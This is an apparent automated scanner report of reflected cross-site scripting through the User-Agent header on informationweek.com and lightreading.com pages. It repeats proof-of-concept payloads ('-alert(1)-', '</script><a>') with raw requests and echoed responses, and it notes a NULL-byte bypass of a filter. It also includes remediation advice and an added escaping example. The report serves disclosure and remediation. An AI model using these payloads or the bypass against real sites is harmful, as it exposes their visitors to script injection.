Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:55 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:55 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62047
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fd212</script>d0389d5d785"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 571d2"-alert(1)-"7e249f5337f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)571d2"-alert(1)-"7e249f5337f
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:47 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:47 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62958
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)571d2"-alert(1)-"7e249f5337f"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76ab0</script><a>01eff4aaf68 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /whitepaper/advancedSearch/resultsCollection.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: 76ab0</script><a>01eff4aaf68
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:54 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:54 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 52004
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82764"-alert(1)-"ffb3d3b0e8f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)82764"-alert(1)-"ffb3d3b0e8f
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:10:39 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 263581
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)82764"-alert(1)-"ffb3d3b0e8f"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
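The s.prop8 assignment in the response above is the pattern every finding in this group shares: the client IP and the raw User-Agent header are concatenated into a double-quoted JavaScript string literal, so a `"` in the header closes the literal and `-alert(1)-` becomes an expression the browser evaluates before the trailing `"` opens a new string. The following is an added example, not code from Light Reading, the analytics library that emits s.prop8, or the scanner. It reconstructs the vulnerable concatenation from the visible s.prop8 line, shows the hardened form using a \uXXXX encoder for the JavaScript string context, and executes both snippets with `alert` replaced by a counter so the difference is observable without a browser. The function names, the encoder, and the use of `new Function` as a stand-in for the browser's script execution are assumptions.

```javascript
// Added example (not the site's or the scanner's code): vulnerable versus
// hardened rendering of a request header into a JavaScript string literal.
// Function names, the encoder and the sandbox are assumptions; the s.prop8
// template is reconstructed from the response shown in the finding above.

// Marker payload from the finding above, appended to an ordinary User-Agent.
const PAYLOAD = '82764"-alert(1)-"ffb3d3b0e8f';
const UA = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' + PAYLOAD;
const CLIENT_IP = '174.121.222.18';

// Vulnerable: raw concatenation into a double-quoted JS string, as the page does.
function renderVulnerable(clientIp, userAgent) {
  return 's.prop8="' + clientIp + ' | ' + userAgent + '";';
}

// Encoder for the JS string-literal context: every character outside a small
// allow list of letters, digits, space and a few punctuation marks becomes a
// \uXXXX escape. Because '"', '\\', '<', '/', CR, LF and U+2028/U+2029 are all
// escaped, the value can neither terminate the literal nor, via a literal
// "</script", terminate the enclosing script block in the HTML parser.
function jsStringEscape(value) {
  let out = '';
  for (const ch of String(value)) {
    const cp = ch.codePointAt(0);
    if (/^[A-Za-z0-9 ,._-]$/.test(ch)) {
      out += ch;
    } else if (cp <= 0xffff) {
      out += '\\u' + cp.toString(16).padStart(4, '0');
    } else {
      out += '\\u{' + cp.toString(16) + '}'; // astral code point (ES2015+ syntax)
    }
  }
  return out;
}

// Hardened: same template, but each untrusted value passes through the encoder.
function renderHardened(clientIp, userAgent) {
  return 's.prop8="' + jsStringEscape(clientIp) + ' | ' + jsStringEscape(userAgent) + '";';
}

// Stand-in for the browser: run the inline script with an empty `s` object and
// an `alert` spy, then report what the page would have observed.
function runSnippet(snippet) {
  const s = {};
  let alertCalls = 0;
  const alertSpy = () => { alertCalls += 1; return 0; };
  new Function('s', 'alert', snippet)(s, alertSpy);
  return { prop8: s.prop8, alertCalls };
}

// Stand-alone run: the vulnerable snippet fires the injected alert and loses
// the string (the expression evaluates to NaN); the hardened one round-trips
// the header byte-for-byte and executes nothing.
console.log('vulnerable:', runSnippet(renderVulnerable(CLIENT_IP, UA))); // { prop8: NaN, alertCalls: 1 }
console.log('hardened:  ', runSnippet(renderHardened(CLIENT_IP, UA)));   // alertCalls: 0, prop8 === CLIENT_IP + ' | ' + UA
```

The encoder also neutralises the `76ab0</script><a>01eff4aaf68` style payload seen in the informationweek.com finding, because the HTML parser ends a script block at `</script` regardless of JavaScript quoting, and that sequence cannot survive the escaping of `<` and `/`. A stricter fix removes the value from inline script altogether, for example by emitting it in an HTML attribute with HTML encoding and reading it from the DOM, or in a `<script type="application/json">` element parsed with JSON.parse, so that no JavaScript-context encoding has to be right on every page.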
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feddd"-alert(1)-"8755c8df80a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ad_redirect.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)feddd"-alert(1)-"8755c8df80a
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:01:47 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 262285
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)feddd"-alert(1)-"8755c8df80a"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c554"-alert(1)-"19027e0a1c6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /alcatel-lucent-solution-center.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8c554"-alert(1)-"19027e0a1c6
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:19:17 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 158678
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Alcatel-Lucent, Application Enablement, Eco-sustainability, End to End LTE, Cost Transfor ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8c554"-alert(1)-"19027e0a1c6"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4ea1"-alert(1)-"fa4e93f88a0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /archives.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a4ea1"-alert(1)-"fa4e93f88a0
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:02:30 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Last-modified: Sat, 11 Dec 2010 23:02:29 GMT
Expires: Sun, 10 Apr 2011 19:02:29 GMT
Etag: s200805.p200805
Content-Length: 177610
Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a4ea1"-alert(1)-"fa4e93f88a0"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97124"-alert(1)-"b9909a118e9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /asia/ HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)97124"-alert(1)-"b9909a118e9
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:18:07 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 240908
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)97124"-alert(1)-"b9909a118e9"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 469dc"-alert(1)-"dfaff2c87c8 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /benchmark-surveys.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)469dc"-alert(1)-"dfaff2c87c8
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:20:14 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 176121
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)469dc"-alert(1)-"dfaff2c87c8"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77c67"-alert(1)-"54c9b998919 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blackberry-solution-center.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)77c67"-alert(1)-"54c9b998919
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:20:03 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 163025
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Research in Motion, BlackBerry, BlackBerry Platform, CIO's Guide, BlackBerry Business Sol ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)77c67"-alert(1)-"54c9b998919"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e989"-alert(1)-"7b3ba870779 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog.asp?blog_sectionid=419&doc_id=180545&site=cdn& HTTP/1.1
Host: www.lightreading.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.109e989"-alert(1)-"7b3ba870779
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lightreading%5Flastvisit=12%2F1%2F2010+8%3A11%3A47+PM; lightreading%5Fvisits=1; s_nr=1291273863933
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90d70"-alert(1)-"54e4836e960 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)90d70"-alert(1)-"54e4836e960
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:01:42 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 262285
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)90d70"-alert(1)-"54e4836e960"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efe39"-alert(1)-"a8b91e4d902 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /calendar_reports.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)efe39"-alert(1)-"a8b91e4d902
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:18:15 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 173823
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)efe39"-alert(1)-"a8b91e4d902"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6781e"-alert(1)-"1eb6c2e8295 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /calendar_webinars.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6781e"-alert(1)-"1eb6c2e8295
